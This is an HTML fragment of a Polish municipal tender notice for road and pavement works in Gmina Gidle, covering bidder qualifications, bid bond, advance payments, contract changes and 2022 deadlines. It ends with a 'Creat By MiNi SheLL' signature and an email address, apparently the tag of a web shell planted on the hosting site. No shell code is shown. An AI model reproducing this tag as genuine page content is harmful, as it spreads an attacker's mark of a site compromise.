class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące :<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku.<br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności tj.: o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia, tj. <br/>1. Wykonawcy, którzy wykonali w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, tj:<br/>minimum dwie roboty budowlane (na podstawie dwóch odrębnych umów), każda z nich o wartości nie mniejszej niż 200.000,00 zł brutto (słownie: dwieście tysięcy złotych brutto) polegające na budowie lub przebudowie drogi o nawierzchni bitumicznej (asfaltowej)<br/>wraz z podaniem ich rodzaju i wartości, daty, miejsca wykonania oraz podmiotów, na rzecz których roboty zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie , przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów –inne odpowiednie dokumenty.<br/><br/>2. o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie osób, które zostaną skierowane przez Wykonawcę do realizacji zamówienia tj. który wykaże się: <br/>a) co najmniej 1 osobą, która będzie pełnić funkcje kierownika budowy posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności inżynierii drogowej- określone przepisami ustawy Prawo budowlane.<br/>Uwaga!<br/>Wskazana osoba w pkt. 2. lit. a) powinna posiadać uprawnienia budowlane i doświadczenie zawodowe adekwatne do wykonywanych czynności objętych przedmiotem zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona składa na wezwanie Zamawiającego w wyznaczonym terminie aktualne na dzień ich złożenia niżej wskazane podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu <br/>a)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencję bądź dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty.<br/>b)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1) aktualne na dzień składania ofert odpowiednio oświadczenie lub oświadczenia, o których mowa w pkt 7.1,7.3 i 7.6.3) IDW ,<br/>2) zobowiązanie podmiotu do udostępnienia zasobów, jeżeli wykonawca polega na zasobach innego podmiotu,<br/>3) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy (jeżeli dotyczy);<br/>4) dowody równoważności, o których mowa w pkt 3.2. IDW, jeżeli wykonawca zaoferował rozwiązania równoważne w stosunku do określonych w opisie przedmiotu zamówienia;<br/>5) uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie informacje jako tajemnicę przedsiębiorstwa;<br/>6) dokumenty potwierdzające wniesienie wadium określone pkt 10 IDW; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający określa kwotę wadium w wysokości 34 000,00 złotych.<br/>Wadium wykonawca wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofert.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020r, poz. 299).<br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego Bank Spółdzielczy Żytno ul. Konopnickiej 26, 97-532 Żytno<br/>Nr rachunku: 92 8267 1019 2101 0000 0127 0002<br/>z dopiskiem: Wadium – „Przebudowa, remont dróg oraz budowa chodników na terenie Gminie Gidle”<br/>Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert.<br/>Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt. 10.3 ppkt, 2-4 IDW, wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o zamówienie.<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2)	W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 7.1. IDW, składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4)	W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do występowania w obrocie gospodarczym lub zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, o którym mowa w pkt 6.4 IDW, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik nr 3 do IDW.<br/>5)	Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zaliczka zostanie przekazana Wykonawcy w kwocie 5 % wynagrodzenia. <br/>2. Wykonawca wystąpi niezwłocznie po zawarciu umowy o udzielenie zaliczki na realizację Przedmiotu umowy w wysokości 5% wynagrodzenia, o którym mowa w § 5 ust. 1 umowy. Warunkiem udzielenia zaliczki jest doręczenie przez Wykonawcę Zamawiającemu faktury zaliczkowej (można proforma) wraz z zabezpieczeniem zwrotu zaliczki, o którym mowa w pkt. 3. Wypłata zaliczki nastąpi w terminie 10 dni od dnia otrzymania przez Zamawiającego faktury i zabezpieczenia zwrotu zaliczki.<br/>3. Zabezpieczenie zaliczki może być wnoszone w jednej lub kilku formach określonych w art. 442 ust. 3 pkt 1-4 Pzp.<br/>4. W trakcie wykonywania niniejszej umowy Wykonawca może zmieniać formę zabezpieczenia zaliczki na jedną lub kilka form z wymienionych w ust. 3 pod warunkiem zachowania ciągłości jej zabezpieczenia i bez zmniejszenia jej wartości.<br/>5. Gwarancje bankowe lub ubezpieczeniowe przekazane na poczet zabezpieczenia zaliczki będą bezwarunkowe i płatne na pierwsze żądanie Zamawiającego. Wykonawca zapewni, że gwarancje będą ważne i wykonalne, aż do rozliczenia zaliczki.<br/>6. Jeżeli w warunkach przedłożonego przez Wykonawcę zabezpieczenia zaliczki podana jest data jego wygaśnięcia, a Wykonawca na 30 dni roboczych przed tą datą nie wniesie przedłużenia zabezpieczenia zaliczki, Zamawiający jest uprawniony do zrealizowania zabezpieczenia, a z uzyskanych z tego tytułu środków do ustanowienia zabezpieczenia zaliczki. Tego rodzaju zabezpieczenie Zamawiający przechowuje na oprocentowanym rachunku bankowym i zwraca w terminie 14 dni roboczych po ostatecznym rozliczeniu zaliczki wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.<br/>7. Jeżeli zaliczka nie zostanie rozliczona przed końcowym rozliczeniem niniejszej umowy, odstąpieniem od umowy przez Zamawiającego lub Wykonawcę, cała wartość udzielonej, a nierozliczonej zaliczki stanie się natychmiast wymagalna i płatna Zamawiającemu przez Wykonawcę w terminie 14 dni roboczych od dnia otrzymania wezwania do zwrotu nierozliczonej części zaliczki.<br/>8. Za rozliczenie zaliczki, o którym mowa w ust. 7 uznaje się wykonanie robót o wartości nie mniejszej niż wartość zaliczki po potwierdzeniu przez Inspektora Nadzoru ich należytego wykonania.<br/>9.	Termin zapłaty faktury końcowej nastąpi po wykonaniu całości Przedmiotu umowy w terminie nie dłuższym niż 35 dni od dnia odbioru końcowego robót przez Zamawiającego na podstawie faktury wystawionej przez Wykonawcę. Faktura końcowa zostanie pomniejszona o wartość zaliczki, o której mowa w pkt. 2 wypłaty.<br/><br/>Zasady wypłaty wynagrodzenia Wykonawcy zostały ustalone zgodnie z zasadami wskazanymi w:<br/>a)	uchwale Rady Ministrów Nr 84/2021 z dnia 1 lipca 2021r. w sprawie ustanowienia Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych.<br/>b)	Regulaminie BGK – Regulaminie, o którym mowa w § 11 uchwały Rady Ministrów Nr 84/2021. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wszelkie zmiany umowy będą wymagały formy pisemnej i zgody obu Stron pod rygorem nieważności takich zmian.<br/>2.	Zamawiający na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp przewiduje zmiany niniejszej umowy w następujących okolicznościach:<br/>1)	z powodu uzasadnionych zmian w Dokumentacji Projektowej i specyfikacjach technicznych, rozwiązań technicznych oraz sposobu wykonania robót wnioskowanych przez Wykonawcę lub Zamawiającego, jeżeli te zmiany spowodują obniżenie kosztów wykonania robót, kosztów eksploatacji lub skrócenie terminu realizacji Przedmiotu umowy,<br/>2)	z powodu błędów w Dokumentacji projektowej lub specyfikacjach technicznych polegających na jej niezgodności z przepisami prawa lub zasadami wiedzy technicznej, które mają wpływ na należyte wykonanie lub niewykonanie umowy w zakresie niezbędnym do je dostosowania do zasad wiedzy technicznej. Uprawnienie do zmiany wynagrodzenia dotyczy tylko tych błędów, których Wykonawca przy zachowaniu należytej staranności nie mógł wykryć na etapie sporządzania Oferty,<br/>3)	z powodu zmiany przepisów prawnych istotnych dla realizacji Przedmiotu umowy mających wpływ na zakres lub termin wykonania niniejszej umowy w zakresie niezbędnym do dostosowania się do nowych przepisów,<br/>4)	z powodu odbiegających w sposób istotny od przyjętych w Dokumentacji projektowej lub specyfikacjach technicznych warunków geologicznych lub geotechnicznych, które mogą skutkować niewykonaniem lub nienależytym wykonaniem przedmiotu Umowy w zakresie niezbędnym do dostosowania tej dokumentacji do zasad wiedzy technicznej,<br/>5)	wystąpienia niebezpieczeństwa kolizji z innymi równolegle prowadzonymi przez Zamawiającego lub inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji.<br/>6)	w przypadku zmiany stawki podatku VAT wprowadzonej przez władzę ustawodawczą w trakcie trwania Umowy i wynikającej z tego tytułu zmiany kwoty podatku VAT przyjętej do wyliczenia Wynagrodzenia, bez zmiany wysokości wynagrodzenia netto dostosowując kwotę podatku VAT i należne od dnia zmiany przepisów Wynagrodzenie do obowiązujących przepisów,<br/>7)	z powodu wystąpienia nadzwyczajnej zmiany okoliczności, których strony Umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności w zakresie niezbędnym do należytego wykonania Umowy.<br/>3.	W okolicznościach określonych w ust. 2 pkt 1-5 i 7 Zamawiający, jeżeli będą one miały wpływ na pierwotny zakres zobowiązania Wykonawcy dopuszcza możliwość zmiany tego zakresu oraz sposobu, terminu wykonania niniejszej umowy i wynagrodzenia Wykonawcy.<br/>4.	Zamawiający przewiduje także możliwość zmiany niniejszej umowy w stosunku do treści Oferty Wykonawcy, jeżeli zachodzi jedna z okoliczności, o których mowa w art. 455 ust. 1 pkt 2-4 i ust. 2 na warunkach tam określonych.<br/>5.	W przypadkach, o których mowa w ust. 3 i 4 , jeżeli zmiana przewiduje wykonanie robót zamiennych , dodatkowych lub zaniechanych wykonanie przewidzianych w nich Robót musi być stwierdzone w Protokole konieczności.<br/>6.	W przypadku wystąpienia robót określonych w ust. 5 do Protokołu konieczności Wykonawca załączy ich rozliczenie w oparciu o Kosztorys ofertowy, o którym mowa w § 2 ust. 1 niniejszej umowy złożony przez Wykonawcę. A w przypadku braku w nim cen jednostkowych takich robót w oparciu o kosztorys planowanych do wykonania robót opracowany metodą szczegółową wg danych wyjściowych przyjętych do opracowania Kosztorysu ofertowego zgodnie z postanowieniami § 8 ust. 4-7 Umowy.<br/>7.	Postanowienie umowne zmienione z naruszeniem ustawy Pzp podlega unieważnieniu. Na miejsce unieważnionych postanowień niniejszej umowy wchodzą postanowienia umowne w pierwotnym brzmieniu.<br/>8.	Zamawiający zamierzając dokonać zmiany warunków realizacji Przedmiotu umowy, które wykraczają poza zmiany umowy dopuszczalne przepisami ustawy Pzp obowiązany jest przeprowadzić nowe postępowanie o udzielenie zamówienia.<br/>Rodzaj, zakres zmian oraz warunki ich wprowadzenia zostały określone w Rozdziale IV SWZ - wzór umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-16 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-16 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający informuje, że niniejsza inwestycja pn.: „Przebudowa, remont dróg oraz budowa chodników na terenie Gminy Gidle” jest dofinansowana z Programu Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych.<br/><br/>Zasady wypłaty wynagrodzenia Wykonawcy zostały ustalone zgodnie z zasadami wskazanymi w:<br/>a) uchwale Rady Ministrów Nr 84/2021 z dnia 1 lipca 2021r. w sprawie ustanowienia Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych.<br/>b) Regulaminie BGK – Regulaminie, o którym mowa w § 11 uchwały Rady Ministrów Nr 84/2021.<br/><br/>Zamawiający przekaże Wykonawcy zaliczkę w wysokości 5% wynagrodzenia, pozostała część wynagrodzenia wypłacona zostanie po zakończeniu Inwestycji.<br/>Wykonawca jest zobowiązany do zapewnienia finansowania inwestycji w części niepokrytej<br/>udziałem własnym Zamawiającego, na czas poprzedzający wypłatę dofinansowania z Programu w ramach udzielonej wstępnej Promesy, Wykonawca oświadcza, że posiada odpowiednią zdolność ekonomiczną i środki, niezbędne do wykonania zamówienia oraz zapewnienia finansowanie inwestycji w okresie poprzedzającym otrzymanie wynagrodzenia.<br/>Zapłata wynagrodzenia Wykonawcy Inwestycji w całości nastąpi po wykonaniu całego<br/>przedmiotu zamówienia w terminie nie dłuższym niż 35 dni od dnia odbioru końcowego robót<br/>przez Zamawiającego. Płatność końcowa zostanie pomniejszona o wartość wypłaconej zaliczki.<br/><br/>Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami:<br/>- w sprawie procedury przetargowej: Ilona Śrubarczyk-Ociepa, tel. 34 327-20-27 e-mail:<br/>zampubliczne@gidle.pl<br/>- w sprawach związanych z przedmiotem zamówienia<br/>Marian Binek, tel. 34 327-20-27 e-mail: drogi@gidle.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com